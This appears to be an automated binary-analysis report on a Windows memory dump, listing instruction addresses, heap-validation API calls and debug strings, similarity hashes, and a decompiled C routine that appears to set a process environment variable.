0x6ac24997
0x6ac247ef
0x6ac247ef
0x6ac247ef
0x00000000
0x6ac247ef
0x6ac24890
0x6ac24890
0x6ac24891
0x6ac24891
0x6ac24894
0x6ac24897
0x6ac2489d
0x6ac248a0
0x00000000
0x00000000
0x6ac248a2
0x6ac248a3
0x6ac248a6
0x00000000
0x00000000
0x00000000
0x6ac248a6
0x6ac248fb
0x6ac24901
0x6ac24905
0x6ac24924
0x6ac24929
0x6ac24907
0x6ac2491c
0x6ac24921
0x6ac2492f
0x6ac24935
0x6ac24936
0x6ac24939
0x6ac24942
0x00000000
0x6ac24947
0x6ac24835
0x6ac2483b
0x6ac2483f
0x6ac2485e
0x6ac24863
0x6ac24841
0x6ac24856
0x6ac2485b
0x6ac24869
0x6ac2486c
0x6ac2486f
0x6ac247e7
0x6ac247e7
0x00000000
0x6ac247ec
0x6ac247aa
0x6ac247b0
0x6ac247b4
0x6ac247d3
0x6ac247d8
0x6ac247b6
0x6ac247cb
0x6ac247d0
0x6ac247de
0x6ac247df
0x6ac247e2
0x00000000
0x00000000
0x00000000
0x00000000
0x6ac2476f
0x6ac2476f
0x6ac24778
0x6ac24785
0x6ac24787
0x6ac2478c
0x6ac2478e
0x00000000
0x00000000
0x6ac24790
0x6ac24792
0x6ac24794
0x00000000
0x00000000
0x6ac24796
0x6ac24799
0x00000000
0x6ac24799
0x00000000
0x6ac245c3
0x6ac245c3
0x6ac245c7
0x6ac245c7
0x6ac245ca
0x6ac245cf
0x6ac245d3
0x6ac245df
0x6ac245e4
0x6ac245e6
0x6ac245e8
0x6ac245ed
0x6ac245ed
0x6ac245f2
0x6ac245f2
0x6ac245f7
0x6ac245fc
0x6ac24602
0x6ac24606
0x6ac24609
0x6ac2460f
0x6ac246de
0x6ac246e3
0x6ac246e5
0x6ac246ec
0x6ac246ee
0x6ac246f6
0x6ac246f6
0x6ac246f6
0x6ac246f6
0x6ac246ec
0x6ac24615
0x6ac24615
0x6ac2461d
0x6ac2462e
0x6ac2462e
0x6ac2461d
0x6ac2460f
0x6ac24609
0x6ac246fd
0x00000000
0x00000000
0x6ac24710
0x6ac2471a
0x6ac24720
0x6ac24720
0x6ac24722
0x6ac2472c
0x00000000
0x6ac2472e
0x6ac2472e
0x00000000
0x6ac2472e
0x6ac2472c
0x6ac24738
0x6ac2473c
0x6ac2474b
0x6ac24751
0x6ac24751
0x00000000
0x6ac2473c
0x6ac248f4
0x6ac248f4
0x00000000
0x6ac248f4

APIs

Part of subcall function 6AC249A4: ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004,00000000,?,00000000,?,?,6AC244B7,?), ref: 6AC249DF
Part of subcall function 6AC249A4: RtlCompareMemory.1105(?,01000000,?,00000000,?,00000000,?,?,6AC244B7,?), ref: 6AC249FE
Part of subcall function 6AC249A4: DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?), ref: 6AC24A42
Part of subcall function 6AC249A4: DbgPrint.1105(Heap %p - headers modified (%p is %lx instead of %lx),?,HEAP: ,HEAP: ,00000000,?), ref: 6AC24A66

ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004), ref: 6AC2459A
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC24657
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC24664
DbgPrint.1105(Non-Dedicated free list element %p is out of order,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC24670
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC246B8
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC246C5
DbgPrint.1105(dedicated (%04Ix) free list element %p is marked busy,00000000,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20), ref: 6AC246D4
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC247CB
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC247D8
DbgPrint.1105(Total size of free blocks in arena (%Id) does not match number total in heap header (%Id),?,?,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20), ref: 6AC247E7
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC24856
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC24863
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC2491C
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC24929
DbgPrint.1105(Pseudo Tag %04x size incorrect (%Ix != %Ix) %p,?,00000000,00000000,00000000), ref: 6AC24942
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C), ref: 6AC24970
DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6AC40F20,0000001C,6ABBF07A), ref: 6AC2497D
DbgPrint.1105(Tag %04x (%ws) size incorrect (%Ix != %Ix) %p,?,?,00000000,?,?), ref: 6AC24997

Strings

dedicated (%04Ix) free list element %p is marked busy, xrefs: 6AC246CF
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 6AC247E2
Non-Dedicated free list element %p is out of order, xrefs: 6AC2466B
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 6AC24992
HEAP[%wZ]: , xrefs: 6AC24652, 6AC246B3, 6AC247C6, 6AC24851, 6AC24917, 6AC2496B
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 6AC2486F
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 6AC2493D
HEAP: , xrefs: 6AC2465F, 6AC246C0, 6AC247D3, 6AC2485E, 6AC24924, 6AC24978

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print$Memory$AllocateVirtual$Compare
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 1841224210-1357697941
Opcode ID: 4400ad31ab0ed39110deeee01515d942e250772fee1d714a16f8913a7e5f7227
Instruction ID: f607401a989c5efa46ae0d8836297563ba1a68de75e6c7bf50b4230ac9c2bbce
Opcode Fuzzy Hash: 4400ad31ab0ed39110deeee01515d942e250772fee1d714a16f8913a7e5f7227
Instruction Fuzzy Hash: 34F15639510685EFEB15CF69C584FAAB7F5FF05308F028129E1A697242EF30E985DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB92F70, Relevance: 41.1, APIs: 27, Instructions: 610
memorythreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6AB92F70(void* _a4, void* _a8, signed int _a12, void* _a16, intOrPtr _a20) {
				long _v8;
				signed int _v12;
				char _v20;
				void* _v29;
				char _v30;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				long _v56;
				void* _v60;
				void* _v64;
				long _v68;
				char _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				signed short _v88;
				signed int _v92;
				signed short _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __ebp;
				signed int _t223;
				long _t226;
				signed int _t227;
				intOrPtr _t229;
				void* _t233;
				void* _t244;
				short* _t247;
				void* _t248;
				short* _t251;
				void* _t252;
				void _t253;
				signed int _t262;
				signed int _t266;
				signed short* _t267;
				signed int _t268;
				void* _t269;
				void* _t279;
				void* _t281;
				void _t299;
				signed int _t315;
				signed int _t325;
				void* _t328;
				void* _t329;
				void* _t330;
				signed int _t333;
				void* _t336;
				void* _t337;
				void* _t343;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t352;
				intOrPtr _t353;
				void* _t355;
				void* _t360;
				signed int _t365;
				signed int _t366;
				short* _t369;
				void* _t370;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t380;
				signed short _t381;
				signed short _t382;
				signed int _t389;
				void* _t390;
				void* _t392;
				void* _t393;
				void* _t395;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t403;
				void* _t406;
				short* _t407;
				void* _t408;
				short* _t409;
				void* _t412;
				int _t413;
				void* _t414;
				void* _t415;
				short* _t416;
				signed int _t419;
				int _t421;
				int _t422;
				signed int _t423;
				int _t424;
				int _t425;
				signed int _t427;
				void* _t428;
				intOrPtr _t429;
				int _t430;
				void* _t433;
				short* _t434;
				int _t436;
				int _t437;
				signed int _t438;
				signed int _t441;
				void* _t442;
				void* _t443;
				void* _t445;

				_push(0xfffffffe);
				_push(0x6ac3ff28);
				_push(0x6abb17f0);
				_push( *[fs:0x0]);
				_t443 = _t442 - 0x5c;
				_t223 =  *0x6ac5d360;
				_v12 = _v12 ^ _t223;
				_push(_t223 ^ _t441);
				 *[fs:0x0] =  &_v20;
				_v52 = 0;
				_v68 = 0;
				_v29 = 0;
				_v30 = 0;
				_t419 = _a12;
				if(_t419 == 0) {
					L100:
					_t226 = 0xc000000d;
					L65:
					 *[fs:0x0] = _v20;
					return _t226;
				}
				_t348 = _a8;
				if( *_t348 == 0) {
					goto L100;
				} else {
					_t227 = 1;
					while(_t227 < _t419) {
						_t389 =  *(_t348 + _t227 * 2) & 0x0000ffff;
						if(_t389 == 0 || _t389 == 0x3d) {
							goto L100;
						} else {
							_t227 = _t227 + 1;
							_t348 = _a8;
							continue;
						}
					}
					_t349 = _a16;
					__eflags = _t349;
					if(_t349 == 0) {
						L12:
						_t229 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						_t336 =  *((intOrPtr*)(_t229 + 0x10));
						_v44 = _t336;
						_v108 = _t336;
						_v56 = 0;
						_v72 = 0;
						_t350 = _a4;
						__eflags = _t350;
						if(_t350 != 0) {
							_t351 =  *_t350;
							_v36 = _t351;
							__eflags =  *(_t336 + 0x48) - _t351;
							if( *(_t336 + 0x48) != _t351) {
								L14:
								_v8 = 0;
								_t406 = _t351;
								_v40 = _t406;
								_t337 = 0;
								_v48 = 0;
								__eflags = _t351;
								if(_t351 == 0) {
									L60:
									_t230 = _v72;
									__eflags = _t230;
									if(_t230 != 0) {
										_t406 = _t230;
										_v40 = _t406;
									}
									__eflags = _t337;
									if(_t337 == 0) {
										__eflags = _a16;
										if(_a16 == 0) {
											goto L62;
										}
										__eflags = _t406;
										if(_t406 == 0) {
											_t353 = _a20;
											_t233 = 6 + (_t419 + _t353) * 2;
											_t390 = 0;
											L74:
											_v80 = _t233;
											__eflags = _t233 - _t390;
											if(_t233 < _t390) {
												_t162 = _t353 + 2; // 0x2
												memmove(_t406 + (_t162 + _t419) * 2, _t406, _t337 - _t406 & 0xfffffffe);
												_t421 = _t419 + _t419;
												memcpy(_t406, _a8, _t421);
												_t445 = _t443 + 0x18;
												_t338 = _v29;
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6ac58220, 0, 0x234);
													_t445 = _t445 + 0xc;
												}
												_t407 = _t406 + _t421;
												_v40 = _t407;
												 *_t407 = 0x3d;
												_t408 = _t407 + 2;
												_v40 = _t408;
												_t422 = _a20 + _a20;
												memcpy(_t408, _a16, _t422);
												_t409 = _t408 + _t422;
												_v40 = _t409;
												_t230 = 0;
												 *_t409 = 0;
												_v40 = _t409 + 2;
												__eflags = _a4;
												if(_a4 != 0) {
													goto L63;
												} else {
													_t352 = _v44;
													 *((intOrPtr*)(_t352 + 0x48)) = _v36;
													_t230 = _v80;
													 *((intOrPtr*)(_t352 + 0x290)) = _v80;
													 *((intOrPtr*)(_t352 + 0x294)) =  *((intOrPtr*)(_t352 + 0x294)) + 1;
													goto L64;
												}
											}
											_t355 = E6AB936CC(_t233);
											_v76 = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												L106:
												_v56 = 0xc000009a;
												goto L62;
											}
											__eflags = _t406;
											if(_t406 == 0) {
												_t423 = 0;
											} else {
												_t392 = _v36;
												_t427 = _t406 - _t392;
												__eflags = _t427;
												_t423 = _t427 >> 1;
												memcpy(_t355, _t392, _t423 + _t423);
												_t443 = _t443 + 0xc;
												_t355 = _v76;
											}
											_t244 = _t355 + _t423 * 2;
											_v64 = _t244;
											_t424 = _a12 + _a12;
											memcpy(_t244, _a8, _t424);
											_t247 = _v64 + _t424;
											 *_t247 = 0x3d;
											_t248 = _t247 + 2;
											_v64 = _t248;
											_t425 = _a20 + _a20;
											memcpy(_t248, _a16, _t425);
											_t251 = _v64 + _t425;
											 *_t251 = 0;
											_t252 = _t251 + 2;
											__eflags = _t406;
											if(_t406 == 0) {
												 *_t252 = 0;
												_t338 = _v29;
											} else {
												memcpy(_t252, _t406, _t337 - _t406 & 0xfffffffe);
												_t338 = _v29;
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6ac58220, 0, 0x234);
												}
											}
											_t360 = _a4;
											_t253 = _v76;
											__eflags = _t360;
											if(_t360 != 0) {
												 *_t360 = _t253;
											} else {
												_t360 = _v44;
												 *(_t360 + 0x48) = _t253;
												 *((intOrPtr*)(_t360 + 0x290)) = _v80;
												_t146 = _t360 + 0x294;
												 *_t146 =  *(_t360 + 0x294) + 1;
												__eflags =  *_t146;
											}
											__eflags = _v30;
											if(_v30 != 0) {
												E6AB7EB70(_t360,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
												_v30 = 0;
											}
											_t230 = RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
											goto L63;
										}
										_v48 = _t406;
										while(1) {
											L69:
											_t262 =  *_t406 & 0x0000ffff;
											__eflags = _t262;
											if(_t262 == 0) {
												break;
											}
											while(1) {
												_t406 = _t406 + 2;
												_v48 = _t406;
												__eflags = _t262;
												if(_t262 == 0) {
													goto L69;
												}
												_t262 =  *_t406 & 0x0000ffff;
											}
										}
										_v48 = _t406 + 2;
										_t390 = E6AB935D0(_t351,  *( *[fs:0x30] + 0x18), 0, _t351);
										_t337 = _v48;
										_t365 = (_t337 - _v36 >> 1) + _t419 + _a20;
										__eflags = _t365;
										_t233 = 4 + _t365 * 2;
										_t406 = _v40;
										_t353 = _a20;
										goto L74;
									} else {
										L62:
										_t338 = _v29;
										L63:
										_t352 = _v44;
										L64:
										_v8 = 0xfffffffe;
										E6AB935A1(_t230, _t338, _t352);
										_t226 = _v56;
										goto L65;
									}
								}
								_v64 = _v68;
								while(1) {
									L16:
									__eflags =  *_t406 - _t337;
									if( *_t406 == _t337) {
										break;
									}
									_t428 = _t406;
									_v76 = _t428;
									_t366 = 0;
									__eflags = 0;
									_v80 = 0;
									while(1) {
										_t406 = _t406 + 2;
										_v40 = _t406;
										_t266 =  *_t406 & 0x0000ffff;
										__eflags = _t266;
										if(_t266 == 0) {
											break;
										}
										__eflags = _t266 - 0x3d;
										if(_t266 != 0x3d) {
											continue;
										}
										_t366 = _t406 - _t428 >> 1;
										_v80 = _t366;
										_t406 = _t406 + 2;
										__eflags = _t406;
										_v40 = _t406;
										_t328 = _t406;
										_v52 = _t328;
										while(1) {
											__eflags =  *_t406 - _t337;
											if( *_t406 == _t337) {
												break;
											}
											_t406 = _t406 + 2;
											_v40 = _t406;
										}
										_t399 = _t406 - _t328;
										__eflags = _t399;
										_t400 = _t399 >> 1;
										_v64 = _t400;
										_v68 = _t400;
										break;
									}
									_t406 = _t406 + 2;
									_v40 = _t406;
									_t393 = _a8;
									_t267 = _t393;
									_v60 = _t393;
									_v84 = _t428;
									__eflags = _a12 - _t366;
									if(_a12 <= _t366) {
										_t366 = _a12;
									}
									_t367 = _t393 + _t366 * 2;
									_v104 = _t367;
									while(1) {
										__eflags = _t267 - _t367;
										if(_t267 >= _t367) {
											break;
										}
										_t381 =  *_t267 & 0x0000ffff;
										_v88 = _t381;
										_t401 = _t381 & 0x0000ffff;
										_v92 = _t401;
										_t382 =  *_t428 & 0x0000ffff;
										_v96 = _t382;
										_t438 = _t382 & 0x0000ffff;
										_v100 = _t438;
										__eflags = _t401 - _t438;
										if(_t401 == _t438) {
											L37:
											_t267 =  &(_t267[1]);
											_v60 = _t267;
											_t428 = _v84 + 2;
											_v84 = _t428;
											_t367 = _v104;
											continue;
										}
										_t367 =  *0x6ac56d5c;
										__eflags = _t401 - 0x61;
										if(_t401 >= 0x61) {
											__eflags = _t401 - 0x7a;
											if(_t401 > 0x7a) {
												_t315 = ( *( *0x6ac56d5c + (( *(_t367 + (_t401 >> 8) * 2) & 0x0000ffff) + (_t401 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t401 & 0x0000000f);
												_t367 =  *0x6ac56d5c;
												_t401 =  *((intOrPtr*)(_t367 + _t315 * 2)) + _v88 & 0x0000ffff;
												_t267 = _v60;
											} else {
												_t401 = _t401 + 0xffffffe0;
											}
										}
										_v92 = _t401;
										__eflags = _t438 - 0x61;
										if(_t438 >= 0x61) {
											__eflags = _t438 - 0x7a;
											if(_t438 > 0x7a) {
												_t325 = ( *( *0x6ac56d5c + (( *(_t367 + (_t438 >> 8) * 2) & 0x0000ffff) + (_t438 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t438 & 0x0000000f);
												_t367 =  *0x6ac56d5c;
												_t438 =  *((intOrPtr*)( *0x6ac56d5c + _t325 * 2)) + _v96 & 0x0000ffff;
												_t267 = _v60;
											} else {
												_t438 = _t438 + 0xffffffe0;
											}
										}
										_v100 = _t438;
										__eflags = _t401 - _t438;
										if(_t401 == _t438) {
											goto L37;
										} else {
											_t395 = _t401 - _t438;
											__eflags = _t395;
											L32:
											__eflags = _t395;
											if(__eflags == 0) {
												_t343 = _t406;
												_v48 = _t343;
												while(1) {
													L44:
													_t268 =  *_t343 & 0x0000ffff;
													__eflags = _t268;
													if(_t268 == 0) {
														break;
													}
													while(1) {
														_t343 = _t343 + 2;
														_v48 = _t343;
														__eflags = _t268;
														if(_t268 == 0) {
															goto L44;
														}
														_t268 =  *_t343 & 0x0000ffff;
													}
												}
												_t337 = _t343 + 2;
												_v48 = _t337;
												_t269 = _a16;
												__eflags = _t269;
												if(_t269 == 0) {
													_push(_t337 - _t406 & 0xfffffffe);
													_push(_t406);
													_push(_v76);
													L89:
													memmove();
													_t443 = _t443 + 0xc;
													L90:
													__eflags = _v29;
													if(_v29 != 0) {
														memset(0x6ac58220, 0, 0x234);
														_t443 = _t443 + 0xc;
													}
													goto L59;
												}
												_t429 = _a20;
												__eflags = _t429 - _v64;
												if(_t429 <= _v64) {
													_t430 = _t429 + _t429;
													memcpy(_v52, _t269, _t430);
													_t443 = _t443 + 0xc;
													_t369 = _v52 + _t430;
													 *_t369 = 0;
													_t370 = _t369 + 2;
													__eflags = _a20 - _v64;
													if(_a20 == _v64) {
														goto L90;
													}
													_t279 = _t337 - _t406 & 0xfffffffe;
													__eflags = _t279;
													_push(_t279);
													_push(_t406);
													_push(_t370);
													goto L89;
												}
												_t412 = _v36;
												_t281 = E6AB935D0(_t367,  *( *[fs:0x30] + 0x18), 0, _t412);
												_t337 = _v48;
												_t376 = (_t337 - _t412 >> 1) - _v68 + _t429 + (_t337 - _t412 >> 1) - _v68 + _t429;
												_v76 = _t376;
												__eflags = _t376 - _t281;
												if(_t376 < _t281) {
													_t413 = _t429 + _t429;
													_t433 = _v52 + 2 + _t413;
													_t377 = _v40;
													_v80 = _t377;
													memmove(_t433, _t377, _t337 - _t377 & 0xfffffffe);
													_t434 = _t433 - 2;
													 *_t434 = 0;
													memcpy(_t434 - _t413, _a16, _t413);
													_t443 = _t443 + 0x18;
													__eflags = _a4;
													if(_a4 == 0) {
														_t378 = _v44;
														 *((intOrPtr*)(_t378 + 0x48)) = _v36;
														 *((intOrPtr*)(_t378 + 0x290)) = _v76;
														_t213 = _t378 + 0x294;
														 *_t213 =  *(_t378 + 0x294) + 1;
														__eflags =  *_t213;
													}
													__eflags = _v29;
													if(_v29 != 0) {
														memset(0x6ac58220, 0, 0x234);
														_t443 = _t443 + 0xc;
													}
													_t406 = _v80;
													goto L59;
												}
												_t414 = E6AB936CC(_t376);
												_v80 = _t414;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L106;
												}
												_t379 = _v36;
												_t436 = (_v52 - _t379 >> 1) + (_v52 - _t379 >> 1);
												memcpy(_t414, _t379, _t436);
												_t415 = _t414 + _t436;
												_t437 = _a20 + _a20;
												memcpy(_t415, _a16, _t437);
												_t416 = _t415 + _t437;
												 *_t416 = 0;
												memcpy(_t416 + 2, _v40, _t337 - _v40 & 0xfffffffe);
												_t443 = _t443 + 0x24;
												_t380 = _a4;
												_t299 = _v80;
												__eflags = _t380;
												if(_t380 != 0) {
													 *_t380 = _t299;
												} else {
													_t380 = _v44;
													 *(_t380 + 0x48) = _t299;
													 *((intOrPtr*)(_t380 + 0x290)) = _v76;
													_t92 = _t380 + 0x294;
													 *_t92 =  *(_t380 + 0x294) + 1;
													__eflags =  *_t92;
												}
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6ac58220, 0, 0x234);
													_t443 = _t443 + 0xc;
												}
												__eflags = _v30;
												if(_v30 != 0) {
													E6AB7EB70(_t380,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
													_v30 = 0;
												}
												RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
												_t406 = _v40;
												_t337 = _v48;
												goto L59;
											}
											if(__eflags < 0) {
												__eflags = _v72 - _t337;
												if(_v72 == _t337) {
													_v72 = _v76;
												}
											}
											goto L16;
										}
									}
									_t395 = _a12 - _v80;
									goto L32;
								}
								L59:
								_t351 = _v36;
								_t419 = _a12;
								goto L60;
							}
							_t329 =  *(_t229 + 0x1c);
							__eflags = _t329;
							if(_t329 == 0) {
								L103:
								_v29 = 1;
								goto L14;
							} else {
								_t330 = E6AB76600(_t329);
								_t351 = _v36;
								__eflags = _t330;
								if(_t330 == 0) {
									goto L14;
								}
								goto L103;
							}
						}
						_v30 = 1;
						_v29 = 1;
						L6AB7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
						_t351 =  *(_t336 + 0x48);
						_v36 = _t351;
						goto L14;
					} else {
						_t333 = 0;
						__eflags = 0;
						_t403 = _a20;
						while(1) {
							__eflags = _t333 - _t403;
							if(_t333 >= _t403) {
								goto L12;
							}
							__eflags =  *((short*)(_t349 + _t333 * 2));
							if( *((short*)(_t349 + _t333 * 2)) == 0) {
								goto L100;
							} else {
								_t333 = _t333 + 1;
								continue;
							}
						}
						goto L12;
					}
				}
			}

0x6ab92f75
0x6ab92f77
0x6ab92f7c
0x6ab92f87
0x6ab92f88
0x6ab92f8e
0x6ab92f93
0x6ab92f98
0x6ab92f9c
0x6ab92fa2
0x6ab92fa9
0x6ab92fb0
0x6ab92fb4
0x6ab92fb8
0x6ab92fbd
0x6abd5e6d
0x6abd5e6d
0x6ab932f1
0x6ab932f4
0x6ab93302
0x6ab93302
0x6ab92fc3
0x6ab92fca
0x00000000
0x6ab92fd0
0x6ab92fd0
0x6ab92fd5
0x6ab92fd9
0x6ab92fe0
0x00000000
0x6ab92fef
0x6ab92fef
0x6ab92ff0
0x00000000
0x6ab92ff0
0x6ab92fe0
0x6ab92ff5
0x6ab92ff8
0x6ab92ffa
0x6ab93013
0x6ab93019
0x6ab9301c
0x6ab9301f
0x6ab93022
0x6ab93025
0x6ab9302c
0x6ab93033
0x6ab93036
0x6ab93038
0x6ab934db
0x6ab934dd
0x6ab934e0
0x6ab934e3
0x6ab9305a
0x6ab9305a
0x6ab93061
0x6ab93063
0x6ab93066
0x6ab93068
0x6ab9306b
0x6ab9306d
0x6ab932cd
0x6ab932cd
0x6ab932d0
0x6ab932d2
0x6ab93478
0x6ab9347a
0x6ab9347a
0x6ab932d8
0x6ab932da
0x6ab93305
0x6ab93309
0x00000000
0x00000000
0x6ab9330b
0x6ab9330d
0x6abd5f99
0x6abd5f9f
0x6abd5fa6
0x6ab93365
0x6ab93365
0x6ab93368
0x6ab9336a
0x6ab93503
0x6ab93513
0x6ab9351b
0x6ab93522
0x6ab93527
0x6ab9352a
0x6ab9352d
0x6ab9352f
0x6ab9353d
0x6ab93542
0x6ab93542
0x6ab93545
0x6ab93547
0x6ab9354f
0x6ab93552
0x6ab93555
0x6ab9355b
0x6ab93563
0x6ab9356b
0x6ab9356d
0x6ab93570
0x6ab93572
0x6ab93578
0x6ab9357b
0x6ab9357e
0x00000000
0x6ab93584
0x6ab93584
0x6ab9358a
0x6ab9358d
0x6ab93590
0x6ab93596
0x00000000
0x6ab93596
0x6ab9357e
0x6ab93377
0x6ab93379
0x6ab9337c
0x6ab9337e
0x6abd5f0c
0x6abd5f0c
0x00000000
0x6abd5f0c
0x6ab93384
0x6ab93386
0x6abd5fad
0x6ab9338c
0x6ab9338e
0x6ab93391
0x6ab93391
0x6ab93393
0x6ab9339b
0x6ab933a0
0x6ab933a3
0x6ab933a3
0x6ab933a6
0x6ab933a9
0x6ab933af
0x6ab933b7
0x6ab933c2
0x6ab933c9
0x6ab933cc
0x6ab933cf
0x6ab933d5
0x6ab933dd
0x6ab933e8
0x6ab933ec
0x6ab933ef
0x6ab933f2
0x6ab933f4
0x6abd5fb6
0x6abd5fb9
0x6ab933fa
0x6ab93402
0x6ab9340a
0x6ab9340d
0x6ab9340f
0x6ab9341d
0x6ab93422
0x6ab9340f
0x6ab93425
0x6ab93428
0x6ab9342b
0x6ab9342d
0x6ab934ee
0x6ab93433
0x6ab93433
0x6ab93436
0x6ab9343c
0x6ab93442
0x6ab93442
0x6ab93442
0x6ab93442
0x6ab93448
0x6ab9344c
0x6ab93457
0x6ab9345c
0x6ab9345c
0x6ab9346e
0x00000000
0x6ab9346e
0x6ab93313
0x6ab93316
0x6ab93316
0x6ab93316
0x6ab93319
0x6ab9331c
0x00000000
0x00000000
0x6ab93320
0x6ab93320
0x6ab93323
0x6ab93326
0x6ab93329
0x00000000
0x00000000
0x6ab9332b
0x6ab9332b
0x6ab93320
0x6ab93333
0x6ab93347
0x6ab93349
0x6ab93355
0x6ab93355
0x6ab93358
0x6ab9335f
0x6ab93362
0x00000000
0x6ab932dc
0x6ab932dc
0x6ab932dc
0x6ab932df
0x6ab932df
0x6ab932e2
0x6ab932e2
0x6ab932e9
0x6ab932ee
0x00000000
0x6ab932ee
0x6ab932da
0x6ab93076
0x6ab93080
0x6ab93080
0x6ab93080
0x6ab93083
0x00000000
0x00000000
0x6ab93089
0x6ab9308b
0x6ab9308e
0x6ab9308e
0x6ab93090
0x6ab93093
0x6ab93093
0x6ab93096
0x6ab93099
0x6ab9309c
0x6ab9309f
0x00000000
0x00000000
0x6ab930a1
0x6ab930a4
0x00000000
0x00000000
0x6ab930aa
0x6ab930ac
0x6ab930af
0x6ab930af
0x6ab930b2
0x6ab930b5
0x6ab930b7
0x6ab930c0
0x6ab930c0
0x6ab930c3
0x00000000
0x00000000
0x6ab930c5
0x6ab930c8
0x6ab930c8
0x6ab930cf
0x6ab930cf
0x6ab930d1
0x6ab930d3
0x6ab930d6
0x00000000
0x6ab930d6
0x6ab930d9
0x6ab930dc
0x6ab930df
0x6ab930e2
0x6ab930e4
0x6ab930e7
0x6ab930ea
0x6ab930ed
0x6ab93153
0x6ab93153
0x6ab930ef
0x6ab930f2
0x6ab930f5
0x6ab930f5
0x6ab930f7
0x00000000
0x00000000
0x6ab930fd
0x6ab93100
0x6ab93103
0x6ab93106
0x6ab93109
0x6ab9310c
0x6ab9310f
0x6ab93112
0x6ab93115
0x6ab93117
0x6ab93158
0x6ab93158
0x6ab9315b
0x6ab93161
0x6ab93164
0x6ab93167
0x00000000
0x6ab93167
0x6ab93119
0x6ab9311f
0x6ab93122
0x6ab9317a
0x6ab9317d
0x6abd5eb7
0x6abd5eb9
0x6abd5ec7
0x6abd5eca
0x6ab93183
0x6ab93183
0x6ab93183
0x6ab9317d
0x6ab93124
0x6ab93127
0x6ab9312a
0x6ab9316c
0x6ab9316f
0x6abd5ef1
0x6abd5ef3
0x6abd5f01
0x6abd5f04
0x6ab93175
0x6ab93175
0x6ab93175
0x6ab9316f
0x6ab9312c
0x6ab9312f
0x6ab93131
0x00000000
0x6ab93133
0x6ab93133
0x6ab93133
0x6ab93135
0x6ab93135
0x6ab93137
0x6ab93190
0x6ab93192
0x6ab93195
0x6ab93195
0x6ab93195
0x6ab93198
0x6ab9319b
0x00000000
0x00000000
0x6ab931a0
0x6ab931a0
0x6ab931a3
0x6ab931a6
0x6ab931a9
0x00000000
0x00000000
0x6ab931ab
0x6ab931ab
0x6ab931a0
0x6ab931b0
0x6ab931b3
0x6ab931b6
0x6ab931b9
0x6ab931bb
0x6ab934fc
